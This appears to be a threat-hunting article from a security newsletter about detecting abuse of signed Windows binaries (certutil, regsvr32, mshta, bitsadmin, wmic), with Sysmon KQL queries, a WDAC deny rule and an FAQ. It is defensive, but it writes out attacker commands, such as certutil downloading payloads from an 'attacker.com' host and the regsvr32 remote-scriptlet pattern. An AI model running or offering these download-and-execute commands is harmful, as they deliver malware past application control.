certutil
The most abused LOLBAS binary: certutil -urlcache -split -f [URL] [file] downloads arbitrary files from the internet; certutil -decode decodes base64 files; both functions are built into a Microsoft certificate utility
regsvr32
regsvr32 /s /n /u /i:[URL] scrobj.dll executes COM scriptlets from a URL (the 'Squiblydoo' technique): the payload is never written to disk and bypasses application whitelisting
Sysmon Event 1
Process creation event: the primary hunting source for LOLBAS; captures full command line, parent process, and image hashes for every process created
Sysmon Event 3
Network connection event: catches LOLBAS binaries making outbound connections (certutil downloading payloads, mshta connecting to C2) which are highly anomalous for certificate utilities

SponsoredRetool

Retool's new app builder is where AI-generated code ships safely

Building apps with AI is easy. Getting them to production safely is another story.

Start building for free today

LOLBAS attacks are effective because they abuse trusted, signed Microsoft binaries that bypass application control policies and often do not trigger AV signatures. The LOLBAS project (lolbas-project.github.io) catalogs over 100 Windows binaries with documented attack techniques.

Threat hunting for LOLBAS focuses on two key signals: anomalous command line arguments (certutil making network calls, regsvr32 pointing to a URL) and anomalous parent processes (mshta launched by Office, powershell.exe launched by cmd.exe launched by svchost). Sysmon Event 1 (process creation with full command line) and Event 3 (network connection) provide the primary data.

LOLBAS 1: certutil Abuse Detection

certutil is a certificate management utility that can download files, decode base64, and encode content: legitimate uses are narrow, so network activity or file decoding is highly suspicious.

Known malicious certutil uses:

# Download a payload:
certutil.exe -urlcache -split -f http://attacker.com/payload.exe C:\Windows\Temp\p.exe

# Decode a base64-encoded payload:
certutil.exe -decode encoded.b64 payload.exe

# Download and decode in one step:
certutil -f -urlcache http://attacker.com/payload.b64 C:\Temp\p.b64
certutil -decode C:\Temp\p.b64 C:\Temp\payload.exe

# Alternate data stream abuse:
certutil -urlcache -split -f http://attacker.com/payload.exe C:\temp\test.txt:payload.exe

Hunting with Sysmon (Event 1 + Event 3):

// Sysmon Event 1: certutil with network-related arguments
Event
| where Source == "Microsoft-Windows-Sysmon"
| where EventID == 1  // Process creation
| where RenderedDescription has "certutil"
| where RenderedDescription has_any (
    "-urlcache", "-URL", "http://", "https://",  // Download
    "-decode", "-encode",                          // Encoding operations
    "-split"                                        // Used with downloads
)
| project TimeGenerated, Computer, 
    CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription),
    ParentImage = extract(@'ParentImage: ([^\n]+)', 1, RenderedDescription)

// Sysmon Event 3: certutil making network connections (always suspicious)
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 3
| where RenderedDescription has "certutil.exe"
| where not (RenderedDescription has_any ("10.0.0.", "192.168."))  // Internal CRL distribution points
| project TimeGenerated, Computer, 
    DestIP = extract(@'DestinationIp: ([^\n]+)', 1, RenderedDescription),
    DestPort = extract(@'DestinationPort: ([^\n]+)', 1, RenderedDescription)

LOLBAS 2: regsvr32, mshta, and msiexec

regsvr32 Squiblydoo detection:

// regsvr32 executing a remote COM scriptlet (never legitimate)
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| where RenderedDescription has "regsvr32"
| where RenderedDescription has_any (
    "scrobj.dll",    // Squiblydoo requires scrobj.dll
    "http://",       // Remote URL
    "https://",
    "/u ",           // Squiblydoo flags: /s /n /u /i
    "/n "
)
// regsvr32 should only register local DLLs, never call remote URLs:
| project TimeGenerated, Computer,
    CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription),
    ParentImage = extract(@'ParentImage: ([^\n]+)', 1, RenderedDescription)

mshta remote execution detection:

// mshta executing a remote URL or VBScript (highly suspicious)
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| where RenderedDescription has "mshta"
| where RenderedDescription has_any (
    "http://", "https://",  // Remote HTA file
    "javascript:",          // Inline JS execution
    "vbscript:",            // Inline VBS execution
    "script:"               // Script protocol
)
// Extra suspicion: mshta spawned by Office applications:
| where RenderedDescription has_any (
    "WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE",
    "outlook.exe", "cmd.exe"
)
| project TimeGenerated, Computer,
    CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription),
    ParentImage = extract(@'ParentImage: ([^\n]+)', 1, RenderedDescription)

msiexec remote package execution:

// msiexec downloading and executing a remote MSI (MITRE T1218.007)
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| where RenderedDescription has "msiexec"
| where RenderedDescription has_any (
    "http://", "https://",  // Remote MSI
    "/q",                   // Quiet install (no UI: malware hides installation)
    "ActiveX",              // ActiveX-based COM payload
    "/y"                    // Register DLL (like regsvr32)
)
| project TimeGenerated, Computer,
    CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription)
Free daily briefing

Briefings like this, every morning before 9am.

Threat intel, active CVEs, and campaign alerts, distilled for practitioners. 50,000+ subscribers. No noise.

LOLBAS 3: bitsadmin, wmic, and rundll32

bitsadmin download detection:

// bitsadmin used as a downloader (legitimate use is Windows Update, rare in user context)
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| where RenderedDescription has "bitsadmin"
| where RenderedDescription has_any (
    "/transfer",    // Create a transfer job (download)
    "/addfile",     // Add URL to download
    "/complete",    // Finalize the download
    "/resume"
)
// Alert when run by a user process (not SYSTEM/NETWORK SERVICE):
| where not (RenderedDescription has_any ("SYSTEM", "NETWORK SERVICE"))
| project TimeGenerated, Computer,
    CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription),
    User = extract(@'User: ([^\n]+)', 1, RenderedDescription)

wmic remote execution and process spawning:

// wmic used for lateral movement or process execution
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| where RenderedDescription has "wmic"
| where RenderedDescription has_any (
    "process call create",  // Execute a command on local or remote system
    "/node:",               // Remote WMI execution
    "os get",               // OS enumeration
    "shadowcopy delete",    // Ransomware VSS deletion
    "product get"           // Software enumeration (common in recon)
)
| project TimeGenerated, Computer,
    CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription)

// Alert on wmic shadowcopy delete (ransomware pre-encryption step):
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| where RenderedDescription has "wmic" and RenderedDescription has "shadowcopy"
| project TimeGenerated, Computer,
    CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription)

rundll32 execution of remote or suspicious payloads:

// rundll32 executing from temp directories or with suspicious DLLs
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| where RenderedDescription has "rundll32"
| where RenderedDescription has_any (
    "C:\\Users\\AppData",  // User-writeable path
    "C:\\Temp",
    "C:\\Windows\\Temp",
    ",Control_RunDLL",     // UAC bypass patterns
    "javascript:",
    "http://"
)
| project TimeGenerated, Computer,
    CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription),
    ParentImage = extract(@'ParentImage: ([^\n]+)', 1, RenderedDescription)

Compound Hunting: Parent-Child Anomalies

The most reliable LOLBAS detection signal is an anomalous parent-child process relationship: Office applications spawning cmd.exe or wscript.exe, or wscript.exe spawning mshta.exe.

// Detect Office applications spawning shells or LOLBAS (phishing macro execution)
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| extend ParentImage = extract(@'ParentImage: ([^\n]+)', 1, RenderedDescription)
| extend ChildImage = extract(@'Image: ([^\n]+)', 1, RenderedDescription)
// Parent is an Office application:
| where ParentImage has_any (
    "WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE",
    "outlook.exe", "onenote.exe"
)
// Child is a suspicious binary:
| where ChildImage has_any (
    "cmd.exe", "powershell.exe", "wscript.exe",
    "cscript.exe", "mshta.exe", "certutil.exe",
    "regsvr32.exe", "rundll32.exe"
)
| project TimeGenerated, Computer, ParentImage, ChildImage,
    CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription)

// Detect scheduled task creation via schtasks (persistence):
Event
| where Source == "Microsoft-Windows-Sysmon" and EventID == 1
| where RenderedDescription has "schtasks"
| where RenderedDescription has_any ("/create", "/change")
// Schtasks spawned by unusual parents:
| extend ParentImage = extract(@'ParentImage: ([^\n]+)', 1, RenderedDescription)
| where ParentImage !has_any ("taskhost", "Explorer", "SYSTEM")
| project TimeGenerated, Computer, ParentImage,
    CommandLine = extract(@'CommandLine: ([^\n]+)', 1, RenderedDescription)

Block LOLBAS execution with WDAC (where possible):

<!-- Windows Defender Application Control: block known LOLBAS that are never legitimate
     Add to your WDAC policy as Deny rules: -->
<FileRules>
  <!-- Block certutil network downloads (hash of known version can also be targeted): -->
  <Deny ID="ID_DENY_CERTUTIL" FriendlyName="Block certutil urlcache" 
        FileName="certutil.exe" />
  
  <!-- Alternative: use script enforcement to inspect PowerShell scripts that call LOLBAS -->
  <!-- WDAC script enforcement + CLM blocks PowerShell-driven LOLBAS calls -->
</FileRules>
<!-- Note: Blocking certutil entirely may break certificate operations.
     Prefer detection + AMSI inspection over blocking where the binary is legitimately needed. -->

The bottom line

LOLBAS threat hunting uses Sysmon Event 1 (process creation) to detect anomalous command line arguments for signed binaries: certutil with -urlcache or -decode, regsvr32 with scrobj.dll and a URL, mshta with http:// or javascript: arguments, bitsadmin with /transfer in a user context. Compound the detection with parent-child anomalies: any Office application (WINWORD.EXE, EXCEL.EXE) spawning cmd.exe, wscript.exe, or mshta.exe is high-confidence malicious. Use the LOLBAS Project database (lolbas-project.github.io) to identify the full set of abusable binaries and their documented techniques for building a comprehensive hunting library.

Frequently asked questions

What are LOLBAS and why are they difficult to detect?

LOLBAS (Living Off the Land Binaries and Scripts) are legitimate, Microsoft-signed Windows executables that attackers abuse for malicious purposes: certutil downloads payloads, regsvr32 executes COM scriptlets from URLs, mshta runs remote JScript/VBScript. They are difficult to detect because they are trusted by application control solutions (signed by Microsoft), may not trigger AV signatures (they are legitimate binaries, not malware), and blend in with normal Windows operations. Detection requires focusing on anomalous usage context: the command line arguments, parent process, network activity, and destination path.

How do you detect certutil being used maliciously?

Monitor Sysmon Event 1 (process creation) for certutil.exe with arguments -urlcache, -split, -decode, or containing http:// or https:// strings: legitimate certutil use is narrow (certificate validation, CA operations) and never requires downloading from arbitrary internet URLs. Also monitor Sysmon Event 3 (network connection) for certutil.exe making outbound connections to external IPs: certutil should only connect to CRL distribution points on internal infrastructure. Either signal is high-confidence malicious.

How do you build a threat hunting hypothesis for LOLBin abuse?

Structure LOLBin hunting hypotheses in three parts: attacker goal (what are they trying to accomplish?), technique (which LOLBin achieves that goal?), and observable (what evidence does this leave?). Example: Goal: download second-stage payload. Technique: certutil.exe -urlcache -split -f http://attacker.com/payload.exe. Observable: certutil.exe process with outbound network connection and -urlcache in command line. For each LOLBin in your environment, list its legitimate use case and its offensive use case, then write detection logic that fires on the offensive use case while excluding the known legitimate pattern. Sigma rules from SigmaHQ (github.com/SigmaHQ/sigma) provide pre-built hunting logic for most LOLBin techniques.

What are the most commonly abused LOLBins that security teams should monitor?

Top 10 LOLBins by abuse frequency in threat intelligence reports: (1) PowerShell.exe — encoded command execution, AMSI bypass; (2) certutil.exe — download and Base64 decode; (3) regsvr32.exe — DLL and scriptlet execution (Squiblydoo); (4) mshta.exe — HTA script execution; (5) wscript.exe/cscript.exe — VBS/JScript execution; (6) bitsadmin.exe — file download; (7) rundll32.exe — arbitrary DLL execution; (8) cmd.exe — used as intermediary for LOLBin chaining; (9) msiexec.exe — remote MSI download and execution; (10) installutil.exe — bypass application allowlisting via .NET InstallUtil. Priority monitoring: instrument Sysmon for all 10 with network connection and parent process context.

How do I use Sigma rules to detect LOLBin abuse in my SIEM?

Sigma is an open-source detection format that can be converted to queries for any SIEM. To use Sigma rules for LOLBin detection: download the SigmaHQ repository, browse the rules/windows/process_creation/ directory for LOLBin-specific rules (e.g., proc_creation_win_certutil_download.yml), and convert using the sigma CLI: 'sigma convert -t splunk rules/windows/process_creation/proc_creation_win_certutil_download.yml'. Sigma rules contain both the detection logic and metadata (status, level, tags with MITRE ATT&CK technique IDs). The sigmahq.github.io website provides pre-converted queries for Splunk, QRadar, Elastic, and Microsoft Sentinel that can be pasted directly into your SIEM.

How do you reduce false positives when hunting for LOLBin abuse without missing real attacker activity?

LOLBin detection generates high false positive rates because these binaries have legitimate uses that vary across environments. Build exclusion lists from your own environment's baseline: collect 30 days of certutil, mshta, and regsvr32 process creation events with full command lines, then use frequency analysis ('aureport --exe --summary' for auditd, or KQL summarize by CommandLine) to identify recurring benign patterns. Encode environment-specific exclusions into your detection queries using 'not' conditions targeting specific parent processes, known command line prefixes, or originating machine names (IT management workstations legitimately use certutil more than user workstations). The strongest signal combination: network connection from a LOLBin (Sysmon Event 3) is far more suspicious than process creation alone; certutil with no outbound connection may be legitimate, but certutil making a connection to a non-internal IP is high-confidence malicious regardless of command line. Sigma rules at SigmaHQ include 'falsepositives' metadata fields documenting known benign sources -- review these before deploying to production to understand where your environment may diverge and require additional exclusion conditions.

Sources & references

  1. LOLBAS Project: Binary Reference Database
  2. MITRE ATT&CK T1218: System Binary Proxy Execution
  3. Sysmon Event ID Reference

Free resources

25
Free download

Critical CVE Reference Card 2025–2026

25 actively exploited vulnerabilities with CVSS scores, exploit status, and patch availability. Print it, pin it, share it with your SOC team.

No spam. Unsubscribe anytime.

Free download

Ransomware Incident Response Playbook

Step-by-step 24-hour IR checklist covering detection, containment, eradication, and recovery. Built for SOC teams, IR leads, and CISOs.

No spam. Unsubscribe anytime.

Free newsletter

Get threat intel before your inbox does.

50,000+ security professionals read Decryption Digest for early warnings on zero-days, ransomware, and nation-state campaigns. Free, daily, no spam.

Unsubscribe anytime. We never sell your data.

Eric Bang
Author

Founder & Cybersecurity Evangelist, Decryption Digest

Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals every morning.

Black Hat Giveaway

Win a $2,495 Black Hat pass.

Full-access to Black Hat USA 2026 in Las Vegas. Subscribe free to enter.

Joins Decryption Digest daily briefing. Unsubscribe anytime.

Related Questions: Answer Hub

Giveaway: Black Hat USA 2026 Full-Access Pass ($2,495 value)

Details →
Daily Briefing

Subscribe to enter the giveaway

Every subscriber is automatically entered. You also get daily threat intel every morning: zero-days, ransomware, and nation-state campaigns. Free. No spam.

Already subscribed? You're already entered.

Giveaway

Win a $2,495 Black Hat USA 2026 pass.